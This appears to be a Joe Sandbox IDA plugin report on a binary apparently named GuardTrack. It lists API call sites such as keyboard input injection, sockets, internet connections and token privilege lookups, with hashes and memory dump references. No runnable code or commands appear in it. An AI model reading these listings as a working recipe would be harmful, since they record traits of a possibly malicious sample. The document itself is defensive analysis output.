                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientMoveRectScreen
                                                          • String ID:
                                                          • API String ID: 3880355969-0
                                                          • Opcode ID: 4cb80533507ea40e7e2ace06d52dc1418d2332be55a88022c885554fe2256051
                                                          • Instruction ID: c592805efe1dfe70831e358b82304dfda8ddaf747de72906a27f6db7260f361e
                                                          • Opcode Fuzzy Hash: 4cb80533507ea40e7e2ace06d52dc1418d2332be55a88022c885554fe2256051
                                                          • Instruction Fuzzy Hash: 59510B35A00209AFDB14DF68C8849AE7BB6FF85320F148569F915D73A0D770AD91CFA0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                          • String ID:
                                                          • API String ID: 2782032738-0
                                                          • Opcode ID: dd4382ed4e5ad70bfa2530ff4ead5fce313e8920abae62896f0e4f3ecbc340c1
                                                          • Instruction ID: b4129b3e72128de54f8d4ed2799f3bae4dfd6f1e12a7c9c081e3411ad815e560
                                                          • Opcode Fuzzy Hash: dd4382ed4e5ad70bfa2530ff4ead5fce313e8920abae62896f0e4f3ecbc340c1
                                                          • Instruction Fuzzy Hash: 9E41A23160064AABDF388FAEC8949AF7FA6BF80360B24856FE85987740D7709D418F44
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0060A68A
                                                          • __itow.LIBCMT ref: 0060A6BB
                                                            • Part of subcall function 0060A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0060A976
                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0060A724
                                                          • __itow.LIBCMT ref: 0060A77B
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow
                                                          • String ID:
                                                          • API String ID: 3379773720-0
                                                          • Opcode ID: 4bd0fb76f7f33168d0a84ae94abcceceaa01ec98b2e045ed6e1f4308d3d98ab1
                                                          • Instruction ID: bfb7db6f4ca83fc334fde5b77827f1670bc5ee274bd582634a97cde73a1a6e00
                                                          • Opcode Fuzzy Hash: 4bd0fb76f7f33168d0a84ae94abcceceaa01ec98b2e045ed6e1f4308d3d98ab1
                                                          • Instruction Fuzzy Hash: 65417F75A40309AFDF15DFA4C849FEF7FBAAB85790F040019F905A3282DB709945CAA6
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 006270BC
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 006270CC
                                                            • Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
                                                            • Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC
                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00627130
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0062713C
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                          • String ID:
                                                          • API String ID: 2214342067-0
                                                          • Opcode ID: d0f1bbb997dde255b7f26b44e48b2cd9bfbeef7859358a07142259f85ffdd770
                                                          • Instruction ID: 6bee735d91cacbe22a131174a2db58f1f511d0ffaf39653de61b69fd0d1b5f76
                                                          • Opcode Fuzzy Hash: d0f1bbb997dde255b7f26b44e48b2cd9bfbeef7859358a07142259f85ffdd770
                                                          • Instruction Fuzzy Hash: 5341A0757406116FEB24AF24DC8AFAA7BA5EF44B10F048458FA599B3C3DA70AC018F91
                                                          APIs
                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00640980), ref: 00626B92
                                                          • _strlen.LIBCMT ref: 00626BC4
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: 302aa638b3b1b9aaff98f6c0e0ede9d9a3fa8e1d837e19934d42790411dff8a8
                                                          • Instruction ID: 386d883f20d2d132a68ad9274a41445998be06c9dd3ddfe665ef27b0ed5fc878
                                                          • Opcode Fuzzy Hash: 302aa638b3b1b9aaff98f6c0e0ede9d9a3fa8e1d837e19934d42790411dff8a8
                                                          • Instruction Fuzzy Hash: 9641E531600519AFCB14FBA4DC99FEEB7AAFF94310F148159F91A97292DB30AD11CB90
                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0061BEE1
                                                          • GetLastError.KERNEL32(?,00000000), ref: 0061BF07
                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0061BF2C
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0061BF58
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3321077145-0
                                                          • Opcode ID: 31100511950509669dfb5df26b290334abe57fb9c781cc3d6d0959d1371c6e33
                                                          • Instruction ID: 65cf19a6a147cea6ca32e6167e13c404cb6ce205d4389ffc086047108ce9cb66
                                                          • Opcode Fuzzy Hash: 31100511950509669dfb5df26b290334abe57fb9c781cc3d6d0959d1371c6e33
                                                          • Instruction Fuzzy Hash: 4941E939600611DFCB21EF15C589A99BBF2FF89310B198488E9499B362CB71FD42CF91
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00638F03
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: b83d37bebcb38766d4f5a359d2be10a75c24504e6bdcf574ce93a7446fbc9af5
                                                          • Instruction ID: edc8e4f5e478a90dcf2cedc1d35aed2c2380b68c4817767702a684d4b6c62f42
                                                          • Opcode Fuzzy Hash: b83d37bebcb38766d4f5a359d2be10a75c24504e6bdcf574ce93a7446fbc9af5
                                                          • Instruction Fuzzy Hash: E231AF34604319AFEF249A18CC49FE837A7EB063A0F244519FA15D72E1DF75E9908AD1
                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 0063B1D2
                                                          • GetWindowRect.USER32(?,?), ref: 0063B248
                                                          • PtInRect.USER32(?,?,0063C6BC), ref: 0063B258
                                                          • MessageBeep.USER32(00000000), ref: 0063B2C9
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: 413ca1a5c69edbb3e2bb4ea3814c57df1a0875db14bbb2e8f7a4f210d4afb964
                                                          • Instruction ID: a4400c10d333185a820ffd6d3e62cd239dab75c6577a4322ac8a2867c466268c
                                                          • Opcode Fuzzy Hash: 413ca1a5c69edbb3e2bb4ea3814c57df1a0875db14bbb2e8f7a4f210d4afb964
                                                          • Instruction Fuzzy Hash: AA415E30A04115DFDB15CF58C884AAE7BF6FF49310F18A2A9EA289B251D730EA51CF91
                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00611326
                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00611342
                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006113A8
                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 006113FA
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 00cbd6dba61c6fcbde741045ebcfd16910e24802d1d17c120bc08f0811c31110
                                                          • Instruction ID: b7a671c96dbe8ee21b4e300c7a79d8416e20335dc52abf49ad01b31c3d7279e1
                                                          • Opcode Fuzzy Hash: 00cbd6dba61c6fcbde741045ebcfd16910e24802d1d17c120bc08f0811c31110
                                                          • Instruction Fuzzy Hash: 3B314B30944618AEFF3486258C05BFDBBBBAB47310F0C821AE6A05A7D9D37489C19B55
                                                          APIs
                                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00611465
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00611481
                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 006114E0
                                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00611532
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 8449acdfedb8d4a360bec416120c77e2493fff886baf77da1d0d2657ac6daa04
                                                          • Instruction ID: cada53f118441e89808a68617cbf256c773fe766313bee654b74038f10e94174
                                                          • Opcode Fuzzy Hash: 8449acdfedb8d4a360bec416120c77e2493fff886baf77da1d0d2657ac6daa04
                                                          • Instruction Fuzzy Hash: 433148709402185EFF34CA658C04BFEBBF7AB87710F0C431AE6815A2D1C37889D29BA1
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005E642B
                                                          • __isleadbyte_l.LIBCMT ref: 005E6459
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005E6487
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005E64BD
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 1ce09fa9acad33b6a3f28ca6f6d60c3fd3df88922674b186d937dd4307a47395
                                                          • Instruction ID: dbd850ce47c77ca72a7b2a3816c7d37500ae6e17b8523605a7e3d7bce013581a
                                                          • Opcode Fuzzy Hash: 1ce09fa9acad33b6a3f28ca6f6d60c3fd3df88922674b186d937dd4307a47395
                                                          • Instruction Fuzzy Hash: 1E31D031600296AFDF298F66CC88BAA7FA5FF513E0F154429E8A4871D1EB31E950DB50
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 0063553F
                                                            • Part of subcall function 00613B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00613B4E
                                                            • Part of subcall function 00613B34: GetCurrentThreadId.KERNEL32 ref: 00613B55
                                                            • Part of subcall function 00613B34: AttachThreadInput.USER32(00000000,?,006155C0), ref: 00613B5C
                                                          • GetCaretPos.USER32(?), ref: 00635550
                                                          • ClientToScreen.USER32(00000000,?), ref: 0063558B
                                                          • GetForegroundWindow.USER32 ref: 00635591
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: eaa97ce6c1c08f3532bfad8e05ce237698b6f1a368a37c298a8781e03ae4ebf3
                                                          • Instruction ID: 4a5a475f4bd7fb378008fcbcdc38f74e15fb6dfa692b4b47b8294a441a4748ff
                                                          • Opcode Fuzzy Hash: eaa97ce6c1c08f3532bfad8e05ce237698b6f1a368a37c298a8781e03ae4ebf3
                                                          • Instruction Fuzzy Hash: E0315071D00119AFDB10EFB5C8859EFB7FAEF98304F10446AE501E7242EA71AE408FA0
                                                          APIs
                                                            • Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3
                                                          • GetCursorPos.USER32(?), ref: 0063CB7A
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,005EBCEC,?,?,?,?,?), ref: 0063CB8F
                                                          • GetCursorPos.USER32(?), ref: 0063CBDC
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,005EBCEC,?,?,?), ref: 0063CC16
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: 173782414ce1e0674bf7bb7d14291f5d2b7c6ac51474d7a8c0aa0e94997b6e14
                                                          • Instruction ID: 04e574094e9dfd3319d512d5b676227f4166891160d93229ef60e783ce612d67
                                                          • Opcode Fuzzy Hash: 173782414ce1e0674bf7bb7d14291f5d2b7c6ac51474d7a8c0aa0e94997b6e14
                                                          • Instruction Fuzzy Hash: 56318F39600158AFCB158F58C859EFABBF6EB49320F0440A9F90AA7361C7316D51EFA0
                                                          APIs
                                                          • __setmode.LIBCMT ref: 005D0BE2
                                                            • Part of subcall function 005C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00617E51,?,?,00000000), ref: 005C4041
                                                            • Part of subcall function 005C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00617E51,?,?,00000000,?,?), ref: 005C4065
                                                          • _fprintf.LIBCMT ref: 005D0C19
                                                          • OutputDebugStringW.KERNEL32(?), ref: 0060694C
                                                            • Part of subcall function 005D4CCA: _flsall.LIBCMT ref: 005D4CE3
                                                          • __setmode.LIBCMT ref: 005D0C4E
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                          • String ID:
                                                          • API String ID: 521402451-0
                                                          • Opcode ID: 75f2891e2ff2cef6cedf7dcb238b3598cd9f58972e1efcc8d140ff1b0f4dd9df
                                                          • Instruction ID: c12b4748074d103ff8f5b13f9bfaef66914f1c5043d049bfe995f72874d3ecb3
                                                          • Opcode Fuzzy Hash: 75f2891e2ff2cef6cedf7dcb238b3598cd9f58972e1efcc8d140ff1b0f4dd9df
                                                          • Instruction Fuzzy Hash: C611F6319041066FD728B7A8984AAFEBF6ABF81310F14011BF204573D2DE715D924BA1
                                                          APIs
                                                            • Part of subcall function 00608D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00608D3F
                                                            • Part of subcall function 00608D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00608D49
                                                            • Part of subcall function 00608D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00608D58
                                                            • Part of subcall function 00608D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00608D5F
                                                            • Part of subcall function 00608D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00608D75
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006092C1
                                                          • _memcmp.LIBCMT ref: 006092E4
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0060931A
                                                          • HeapFree.KERNEL32(00000000), ref: 00609321
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                          • String ID:
                                                          • API String ID: 1592001646-0
                                                          • Opcode ID: 10bf3ede92da7ff0c1717bfb7794d57e7db78df9530d35ab1766514acb94caeb
                                                          • Instruction ID: d20a4ee66c21407622c7d9cb2d22a3d3f3b6d92f06d11d671485b1c98891663d
                                                          • Opcode Fuzzy Hash: 10bf3ede92da7ff0c1717bfb7794d57e7db78df9530d35ab1766514acb94caeb
                                                          • Instruction Fuzzy Hash: 42218C31E80109EFDB18DFA4C945BEEB7BAEF45301F044099E894A7292D770AA04CFA0
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00621E6F
                                                            • Part of subcall function 00621EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00621F18
                                                            • Part of subcall function 00621EF9: InternetCloseHandle.WININET(00000000), ref: 00621FB5
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Internet$CloseConnectHandleOpen
                                                          • String ID:
                                                          • API String ID: 1463438336-0
                                                          • Opcode ID: 762bb19ad2aa62e8ee9158df10c9be37d18c296826d85cc03c6f472947295280
                                                          • Instruction ID: 375d9c1e7cab6c7f2292d8fc181743577c6b99150019fa7039865953c49ebc92
                                                          • Opcode Fuzzy Hash: 762bb19ad2aa62e8ee9158df10c9be37d18c296826d85cc03c6f472947295280
                                                          • Instruction Fuzzy Hash: 3421C235204A25BFEB119F60AC00FBBB7ABBF95700F114019FE919A650DB71E8119F95
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,00642C4C), ref: 00613F57
                                                          • GetLastError.KERNEL32 ref: 00613F66
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00613F75
                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00642C4C), ref: 00613FD2
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                          • String ID:
                                                          • API String ID: 2267087916-0
                                                          • Opcode ID: 0a4cf1c6a572b45d609a70cd6715bdd80ce682b6a06815894737e21dc73d0c76
